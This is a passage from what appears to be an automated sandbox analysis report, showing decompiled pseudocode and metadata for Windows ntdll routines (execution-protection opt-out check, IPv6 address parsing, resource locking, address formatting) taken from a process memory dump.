                                                              							__eflags = _t71 - _v552;
                                                              							if(_t71 >= _v552) {
                                                              								goto L1;
                                                              							}
                                                              						}
                                                              					}
                                                              					/* "Execute=1" found: log that execution protection is turned off for the process and return 1 */
                                                              					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                              					_push(3);
                                                              					_push(0x55);
                                                              					E00B03F92();
                                                              					_t38 = 1;
                                                              					L2:
                                                              					return E00ABE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72); /* security-cookie check, then return _t38 */
                                                              				}
                                                              				L1:
                                                              				_t38 = 0; /* not opted out */
                                                              				goto L2;
                                                              			}

                                                              Instruction address column for the listing above (one entry per statement; 0x00000000 marks a statement without one): 0x00ae7f08 to 0x00ae7f31, 0x00b03ead to 0x00b03f6f and 0x00b0e304 to 0x00b0e35f.
                                                              0x00000000
                                                              0x00000000
                                                              0x00b0e365
                                                              0x00b0e365
                                                              0x00b0e368
                                                              0x00b0e36e
                                                              0x00000000
                                                              0x00000000
                                                              0x00b0e374
                                                              0x00b0e32f
                                                              0x00b03f75
                                                              0x00b03f7a
                                                              0x00b03f7c
                                                              0x00b03f7e
                                                              0x00b03f86
                                                              0x00ae7f39
                                                              0x00ae7f47
                                                              0x00ae7f47
                                                              0x00ae7f37
                                                              0x00ae7f37
                                                              0x00000000

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B03F12
                                                              Strings
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B0E2FB
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B0E345
                                                              • ExecuteOptions, xrefs: 00B03F04
                                                              • Execute=1, xrefs: 00B03F5E
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B03F75
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B03F4A
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B03EC4
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: e914896808a1b51402609df7fd08d615a0cac8e4d663d878f5da1b789c57cc0e
                                                              • Instruction ID: 8c97210ddeb16cc83786f1c81b8adf3e8ca4ae3415487680b747d22588cdff2e
                                                              • Opcode Fuzzy Hash: e914896808a1b51402609df7fd08d615a0cac8e4d663d878f5da1b789c57cc0e
                                                              • Instruction Fuzzy Hash: 5841B971A4025D7ADB20DB95DCDAFDE77FCAB14700F0005AAB505A60C2EE70DB45CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00AF0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				void* _t108;
                                                              				void* _t116;
                                                              				char _t120;
                                                              				short _t121;
                                                              				void* _t128;
                                                              				intOrPtr* _t130;
                                                              				char _t132;
                                                              				short _t133;
                                                              				intOrPtr _t141;
                                                              				signed int _t156;
                                                              				signed int _t174;
                                                              				intOrPtr _t177;
                                                              				intOrPtr* _t179;
                                                              				intOrPtr _t180;
                                                              				void* _t183;
                                                              
                                                              				_t179 = _a4;
                                                              				_t141 =  *_t179;
                                                              				_v16 = 0;
                                                              				_v28 = 0;
                                                              				_v8 = 0;
                                                              				_v24 = 0;
                                                              				_v12 = 0;
                                                              				_v32 = 0;
                                                              				_v20 = 0;
                                                              				if(_t141 == 0) {
                                                              					L41:
                                                              					 *_a8 = _t179;
                                                              					_t180 = _v24;
                                                              					if(_t180 != 0) {
                                                              						if(_t180 != 3) {
                                                              							goto L6;
                                                              						}
                                                              						_v8 = _v8 + 1;
                                                              					}
                                                              					_t174 = _v32;
                                                              					if(_t174 == 0) {
                                                              						if(_v8 == 7) {
                                                              							goto L43;
                                                              						}
                                                              						goto L6;
                                                              					}
                                                              					L43:
                                                              					if(_v16 != 1) {
                                                              						if(_v16 != 2) {
                                                              							goto L6;
                                                              						}
                                                              						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              						L47:
                                                              						if(_t174 != 0) {
                                                              							E00AC8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                              							_t116 = 8;
                                                              							E00ABDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                              						}
                                                              						return 0;
                                                              					}
                                                              					if(_t180 != 0) {
                                                              						if(_v12 > 3) {
                                                              							goto L6;
                                                              						}
                                                              						_t120 = E00AF0CFA(_v28, 0, 0xa);
                                                              						_t183 = _t183 + 0xc;
                                                              						if(_t120 > 0xff) {
                                                              							goto L6;
                                                              						}
                                                              						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                              						goto L47;
                                                              					}
                                                              					if(_v12 > 4) {
                                                              						goto L6;
                                                              					}
                                                              					_t121 = E00AF0CFA(_v28, _t180, 0x10);
                                                              					_t183 = _t183 + 0xc;
                                                              					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                              					goto L47;
                                                              				} else {
                                                              					while(1) {
                                                              						_t123 = _v16;
                                                              						if(_t123 == 0) {
                                                              							goto L7;
                                                              						}
                                                              						_t108 = _t123 - 1;
                                                              						if(_t108 != 0) {
                                                              							goto L1;
                                                              						}
                                                              						_t178 = _t141;
                                                              						if(E00AF06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                              							if(E00AF06BA(_t135, _t178) == 0 || E00AF0A5B(_t136, _t178) == 0) {
                                                              								if(_t141 != 0x3a) {
                                                              									if(_t141 == 0x2e) {
                                                              										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                              											goto L41;
                                                              										} else {
                                                              											_v24 = _v24 + 1;
                                                              											L27:
                                                              											_v16 = _v16 & 0x00000000;
                                                              											L28:
                                                              											if(_v28 == 0) {
                                                              												goto L20;
                                                              											}
                                                              											_t177 = _v24;
                                                              											if(_t177 != 0) {
                                                              												if(_v12 > 3) {
                                                              													L6:
                                                              													return 0xc000000d;
                                                              												}
                                                              												_t132 = E00AF0CFA(_v28, 0, 0xa);
                                                              												_t183 = _t183 + 0xc;
                                                              												if(_t132 > 0xff) {
                                                              													goto L6;
                                                              												}
                                                              												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                              												goto L20;
                                                              											}
                                                              											if(_v12 > 4) {
                                                              												goto L6;
                                                              											}
                                                              											_t133 = E00AF0CFA(_v28, 0, 0x10);
                                                              											_t183 = _t183 + 0xc;
                                                              											_v20 = _v20 + 1;
                                                              											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                              											goto L20;
                                                              										}
                                                              									}
                                                              									goto L41;
                                                              								}
                                                              								if(_v24 > 0 || _v8 > 6) {
                                                              									goto L41;
                                                              								} else {
                                                              									_t130 = _t179 + 1;
                                                              									if( *_t130 == _t141) {
                                                              										if(_v32 != 0) {
                                                              											goto L41;
                                                              										}
                                                              										_v32 = _v8 + 1;
                                                              										_t156 = 2;
                                                              										_v8 = _v8 + _t156;
                                                              										L34:
                                                              										_t179 = _t130;
                                                              										_v16 = _t156;
                                                              										goto L28;
                                                              									}
                                                              									_v8 = _v8 + 1;
                                                              									goto L27;
                                                              								}
                                                              							} else {
                                                              								_v12 = _v12 + 1;
                                                              								if(_v24 > 0) {
                                                              									goto L41;
                                                              								}
                                                              								_a7 = 1;
                                                              								goto L20;
                                                              							}
                                                              						} else {
                                                              							_v12 = _v12 + 1;
                                                              							L20:
                                                              							_t179 = _t179 + 1;
                                                              							_t141 =  *_t179;
                                                              							if(_t141 == 0) {
                                                              								goto L41;
                                                              							}
                                                              							continue;
                                                              						}
                                                              						L7:
                                                              						if(_t141 == 0x3a) {
                                                              							if(_v24 > 0 || _v8 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t130 = _t179 + 1;
                                                              								if( *_t130 != _t141) {
                                                              									goto L41;
                                                              								}
                                                              								_v20 = _v20 + 1;
                                                              								_t156 = 2;
                                                              								_v32 = 1;
                                                              								_v8 = _t156;
                                                              								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              								goto L34;
                                                              							}
                                                              						}
                                                              						L8:
                                                              						if(_v8 > 7) {
                                                              							goto L41;
                                                              						}
                                                              						_t142 = _t141;
                                                              						if(E00AF06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                              							if(E00AF06BA(_t124, _t142) == 0 || E00AF0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t128 = 1;
                                                              								_a7 = 1;
                                                              								_v28 = _t179;
                                                              								_v16 = 1;
                                                              								_v12 = 1;
                                                              								L39:
                                                              								if(_v16 == _t128) {
                                                              									goto L20;
                                                              								}
                                                              								goto L28;
                                                              							}
                                                              						} else {
                                                              							_a7 = 0;
                                                              							_v28 = _t179;
                                                              							_v16 = 1;
                                                              							_v12 = 1;
                                                              							goto L20;
                                                              						}
                                                              					}
                                                              				}
                                                              				L1:
                                                              				_t123 = _t108 == 1;
                                                              				if(_t108 == 1) {
                                                              					goto L8;
                                                              				}
                                                              				_t128 = 1;
                                                              				goto L39;
                                                              			}
                                                              0x00af0c0b
                                                              0x00000000
                                                              0x00af0c0b
                                                              0x00b1eaaa
                                                              0x00000000
                                                              0x00af0a15
                                                              0x00af0bb6
                                                              0x00000000
                                                              0x00af0bc6
                                                              0x00af0bc6
                                                              0x00af0bcb
                                                              0x00af0c15
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0c1d
                                                              0x00af0c20
                                                              0x00af0c21
                                                              0x00af0c24
                                                              0x00af0c24
                                                              0x00af0c26
                                                              0x00000000
                                                              0x00af0c26
                                                              0x00af0bcd
                                                              0x00000000
                                                              0x00af0bcd
                                                              0x00af0b89
                                                              0x00af0b89
                                                              0x00af0b90
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0b96
                                                              0x00000000
                                                              0x00af0b96
                                                              0x00af0a04
                                                              0x00af0a04
                                                              0x00af0b9a
                                                              0x00af0b9a
                                                              0x00af0b9b
                                                              0x00af0b9f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0ba5
                                                              0x00af0ac7
                                                              0x00af0aca
                                                              0x00b1eacf
                                                              0x00000000
                                                              0x00b1eade
                                                              0x00b1eade
                                                              0x00b1eae3
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eaf3
                                                              0x00b1eaf6
                                                              0x00b1eaf7
                                                              0x00b1eafe
                                                              0x00b1eb01
                                                              0x00000000
                                                              0x00b1eb01
                                                              0x00b1eacf
                                                              0x00af0ad0
                                                              0x00af0ad4
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0ada
                                                              0x00af0ae6
                                                              0x00af0c34
                                                              0x00000000
                                                              0x00af0c47
                                                              0x00af0c49
                                                              0x00af0c4a
                                                              0x00af0c4e
                                                              0x00af0c51
                                                              0x00af0c54
                                                              0x00af0c57
                                                              0x00af0c5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0c60
                                                              0x00af0afb
                                                              0x00af0afe
                                                              0x00af0b02
                                                              0x00af0b05
                                                              0x00af0b08
                                                              0x00000000
                                                              0x00af0b08
                                                              0x00af0ae6
                                                              0x00af0b44
                                                              0x00af09f8
                                                              0x00af09f8
                                                              0x00af09f9
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eaa0
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: 7bc6939c111e1587e2e8db1d81fd013e1c9a103528c49f0c8dc4d61d74fddc21
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: B6A18C7190420EDFCF24DFA4C845ABEB7B4AF05305F24856AFA56A7243D7349A82CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 50%
                                                              			E00AF0554(signed int _a4, char _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int* _t49;
                                                              				signed int _t51;
                                                              				signed int _t56;
                                                              				signed int _t58;
                                                              				signed int _t61;
                                                              				signed int _t63;
                                                              				void* _t66;
                                                              				intOrPtr _t67;
                                                              				void* _t69;
                                                              				signed int _t70;
                                                              				void* _t75;
                                                              				signed int _t81;
                                                              				signed int _t84;
                                                              				void* _t86;
                                                              				signed int _t93;
                                                              				signed int _t96;
                                                              				intOrPtr _t105;
                                                              				signed int _t107;
                                                              				void* _t110;
                                                              				signed int _t115;
                                                              				signed int* _t119;
                                                              				void* _t125;
                                                              				void* _t126;
                                                              				signed int _t128;
                                                              				signed int _t130;
                                                              				signed int _t138;
                                                              				signed int _t144;
                                                              				void* _t158;
                                                              				void* _t159;
                                                              				void* _t160;
                                                              
                                                              				_t96 = _a4;
                                                              				_t115 =  *(_t96 + 0x28);
                                                              				_push(_t138);
                                                              				if(_t115 < 0) {
                                                              					_t105 =  *[fs:0x18];
                                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                              						goto L6;
                                                              					} else {
                                                              						__eflags = _t115 | 0xffffffff;
                                                              						asm("lock xadd [eax], edx");
                                                              						return 1;
                                                              					}
                                                              				} else {
                                                              					L6:
                                                              					_push(_t128);
                                                              					while(1) {
                                                              						L7:
                                                              						__eflags = _t115;
                                                              						if(_t115 >= 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _a8;
                                                              						if(_a8 == 0) {
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						} else {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              							_t49 = _t96 + 0x1c;
                                                              							_t106 = 1;
                                                              							asm("lock xadd [edx], ecx");
                                                              							_t115 =  *(_t96 + 0x28);
                                                              							__eflags = _t115;
                                                              							if(_t115 < 0) {
                                                              								L23:
                                                              								_t130 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                              									asm("sbb esi, esi");
                                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b901c0;
                                                              									_push(_t144);
                                                              									_push(0);
                                                              									_t51 = E00AAF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                              									__eflags = _t51 - 0x102;
                                                              									if(_t51 != 0x102) {
                                                              										break;
                                                              									}
                                                              									_t106 =  *(_t144 + 4);
                                                              									_t126 =  *_t144;
                                                              									_t86 = E00AF4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                              									_push(_t126);
                                                              									_push(_t86);
                                                              									E00B03F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                              									E00B03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              									_t130 = _t130 + 1;
                                                              									_t160 = _t158 + 0x28;
                                                              									__eflags = _t130 - 2;
                                                              									if(__eflags > 0) {
                                                              										E00B3217A(_t106, __eflags, _t96);
                                                              									}
                                                              									_push("RTL: Re-Waiting\n");
                                                              									_push(0);
                                                              									_push(0x65);
                                                              									E00B03F92();
                                                              									_t158 = _t160 + 0xc;
                                                              								}
                                                              								__eflags = _t51;
                                                              								if(__eflags < 0) {
                                                              									_push(_t51);
                                                              									E00AF3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                              									asm("int3");
                                                              									while(1) {
                                                              										L32:
                                                              										__eflags = _a8;
                                                              										if(_a8 == 0) {
                                                              											break;
                                                              										}
                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              										_t119 = _t96 + 0x24;
                                                              										_t107 = 1;
                                                              										asm("lock xadd [eax], ecx");
                                                              										_t56 =  *(_t96 + 0x28);
                                                              										_a4 = _t56;
                                                              										__eflags = _t56;
                                                              										if(_t56 != 0) {
                                                              											L40:
                                                              											_t128 = 0;
                                                              											__eflags = 0;
                                                              											while(1) {
                                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                              												asm("sbb esi, esi");
                                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b901c0;
                                                              												_push(_t138);
                                                              												_push(0);
                                                              												_t58 = E00AAF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                              												__eflags = _t58 - 0x102;
                                                              												if(_t58 != 0x102) {
                                                              													break;
                                                              												}
                                                              												_t107 =  *(_t138 + 4);
                                                              												_t125 =  *_t138;
                                                              												_t75 = E00AF4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                              												_push(_t125);
                                                              												_push(_t75);
                                                              												E00B03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                              												E00B03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              												_t128 = _t128 + 1;
                                                              												_t159 = _t158 + 0x28;
                                                              												__eflags = _t128 - 2;
                                                              												if(__eflags > 0) {
                                                              													E00B3217A(_t107, __eflags, _t96);
                                                              												}
                                                              												_push("RTL: Re-Waiting\n");
                                                              												_push(0);
                                                              												_push(0x65);
                                                              												E00B03F92();
                                                              												_t158 = _t159 + 0xc;
                                                              											}
                                                              											__eflags = _t58;
                                                              											if(__eflags < 0) {
                                                              												_push(_t58);
                                                              												E00AF3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                              												asm("int3");
                                                              												_t61 =  *_t107;
                                                              												 *_t107 = 0;
                                                              												__eflags = _t61;
                                                              												if(_t61 == 0) {
                                                              													L1:
                                                              													_t63 = E00AD5384(_t138 + 0x24);
                                                              													if(_t63 != 0) {
                                                              														goto L52;
                                                              													} else {
                                                              														goto L2;
                                                              													}
                                                              												} else {
                                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                              													_push( &_a4);
                                                              													_push(_t61);
                                                              													_t70 = E00AAF970( *((intOrPtr*)(_t138 + 0x18)));
                                                              													__eflags = _t70;
                                                              													if(__eflags >= 0) {
                                                              														goto L1;
                                                              													} else {
                                                              														_push(_t70);
                                                              														E00AF3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                              														L52:
                                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                              														_push( &_a4);
                                                              														_push(1);
                                                              														_t63 = E00AAF970( *((intOrPtr*)(_t138 + 0x20)));
                                                              														__eflags = _t63;
                                                              														if(__eflags >= 0) {
                                                              															L2:
                                                              															return _t63;
                                                              														} else {
                                                              															_push(_t63);
                                                              															E00AF3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                              															_push( &_a4);
                                                              															_push(1);
                                                              															_t63 = E00AAF970( *((intOrPtr*)(_t138 + 0x20)));
                                                              															__eflags = _t63;
                                                              															if(__eflags >= 0) {
                                                              																goto L2;
                                                              															} else {
                                                              																_push(_t63);
                                                              																_t66 = E00AF3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                              																asm("int3");
                                                              																while(1) {
                                                              																	_t110 = _t66;
                                                              																	__eflags = _t66 - 1;
                                                              																	if(_t66 != 1) {
                                                              																		break;
                                                              																	}
                                                              																	_t128 = _t128 | 0xffffffff;
                                                              																	_t66 = _t110;
                                                              																	asm("lock cmpxchg [ebx], edi");
                                                              																	__eflags = _t66 - _t110;
                                                              																	if(_t66 != _t110) {
                                                              																		continue;
                                                              																	} else {
                                                              																		_t67 =  *[fs:0x18];
                                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                              																		return _t67;
                                                              																	}
                                                              																	goto L59;
                                                              																}
                                                              																E00AD5329(_t110, _t138);
                                                              																_t69 = E00AD53A5(_t138, 1);
                                                              																return _t69;
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t56 =  *(_t96 + 0x28);
                                                              												goto L3;
                                                              											}
                                                              										} else {
                                                              											_t107 =  *_t119;
                                                              											__eflags = _t107;
                                                              											if(__eflags > 0) {
                                                              												while(1) {
                                                              													_t81 = _t107;
                                                              													asm("lock cmpxchg [edi], esi");
                                                              													__eflags = _t81 - _t107;
                                                              													if(_t81 == _t107) {
                                                              														break;
                                                              													}
                                                              													_t107 = _t81;
                                                              													__eflags = _t81;
                                                              													if(_t81 > 0) {
                                                              														continue;
                                                              													}
                                                              													break;
                                                              												}
                                                              												_t56 = _a4;
                                                              												__eflags = _t107;
                                                              											}
                                                              											if(__eflags != 0) {
                                                              												while(1) {
                                                              													L3:
                                                              													__eflags = _t56;
                                                              													if(_t56 != 0) {
                                                              														goto L32;
                                                              													}
                                                              													_t107 = _t107 | 0xffffffff;
                                                              													_t56 = 0;
                                                              													asm("lock cmpxchg [edx], ecx");
                                                              													__eflags = 0;
                                                              													if(0 != 0) {
                                                              														continue;
                                                              													} else {
                                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              														return 1;
                                                              													}
                                                              													goto L59;
                                                              												}
                                                              												continue;
                                                              											} else {
                                                              												goto L40;
                                                              											}
                                                              										}
                                                              										goto L59;
                                                              									}
                                                              									__eflags = 0;
                                                              									return 0;
                                                              								} else {
                                                              									_t115 =  *(_t96 + 0x28);
                                                              									continue;
                                                              								}
                                                              							} else {
                                                              								_t106 =  *_t49;
                                                              								__eflags = _t106;
                                                              								if(__eflags > 0) {
                                                              									while(1) {
                                                              										_t93 = _t106;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										__eflags = _t93 - _t106;
                                                              										if(_t93 == _t106) {
                                                              											break;
                                                              										}
                                                              										_t106 = _t93;
                                                              										__eflags = _t93;
                                                              										if(_t93 > 0) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									__eflags = _t106;
                                                              								}
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L23;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L59;
                                                              					}
                                                              					_t84 = _t115;
                                                              					asm("lock cmpxchg [esi], ecx");
                                                              					__eflags = _t84 - _t115;
                                                              					if(_t84 != _t115) {
                                                              						_t115 = _t84;
                                                              						goto L7;
                                                              					} else {
                                                              						return 1;
                                                              					}
                                                              				}
                                                              				L59:
                                                              			}

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B12206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 55c120193cc91647c5914f0e9ac9ba13bf0b2d3894db695e378a5dfe1ebac4b1
                                                              • Instruction ID: 6d0e794618689917f0a0238d4e79fed460fe4c2a4b2ef2dd5fd991b651afa876
                                                              • Opcode Fuzzy Hash: 55c120193cc91647c5914f0e9ac9ba13bf0b2d3894db695e378a5dfe1ebac4b1
                                                              • Instruction Fuzzy Hash: 78512B35B002156FEB15CB18CC81FE633E9EF98710F2182A9FD55EB286DA71EC918790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
E00AF14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
	signed int _v8;
	char _v10;
	char _v140;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t24;
	void* _t26;
	signed int _t29;
	signed int _t34;
	signed int _t40;
	intOrPtr _t45;
	void* _t51;
	intOrPtr* _t52;
	void* _t54;
	signed int _t57;
	void* _t58;

	_t51 = __edx;
	_t24 =  *0xb92088; // 0x757c166b
	_v8 = _t24 ^ _t57;
	_t45 = _a16;
	_t53 = _a4;
	_t52 = _a20;
	if(_a4 == 0 || _t52 == 0) {
		L10:
		_t26 = 0xc000000d;
	} else {
		if(_t45 == 0) {
			if( *_t52 == _t45) {
				goto L3;
			} else {
				goto L10;
			}
		} else {
			L3:
			_t28 =  &_v140;
			if(_a12 != 0) {
				_push("[");
				_push(0x41);
				_push( &_v140);
				_t29 = E00AE7707();
				_t58 = _t58 + 0xc;
				_t28 = _t57 + _t29 * 2 - 0x88;
			}
			_t54 = E00AF13CB(_t53, _t28);
			if(_a8 != 0) {
				_t34 = E00AE7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
				_t58 = _t58 + 0x10;
				_t54 = _t54 + _t34 * 2;
			}
			if(_a12 != 0) {
				_t40 = E00AE7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
				_t58 = _t58 + 0x10;
				_t54 = _t54 + _t40 * 2;
			}
			_t53 = (_t54 -  &_v140 >> 1) + 1;
			 *_t52 = _t53;
			if( *_t52 < _t53) {
				goto L10;
			} else {
				E00AB2340(_t45,  &_v140, _t53 + _t53);
				_t26 = 0;
			}
		}
	}
	return E00ABE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
}

APIs
• ___swprintf_l.LIBCMT ref: 00B1EA22
  • Part of subcall function 00AF13CB: ___swprintf_l.LIBCMT ref: 00AF146B
  • Part of subcall function 00AF13CB: ___swprintf_l.LIBCMT ref: 00AF1490
• ___swprintf_l.LIBCMT ref: 00AF156D
Strings
Memory Dump Source
• Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 8e56ee01cb4204ebe65d36f6a96ce0d07335b03f75e75d3483e97f563eb5173d
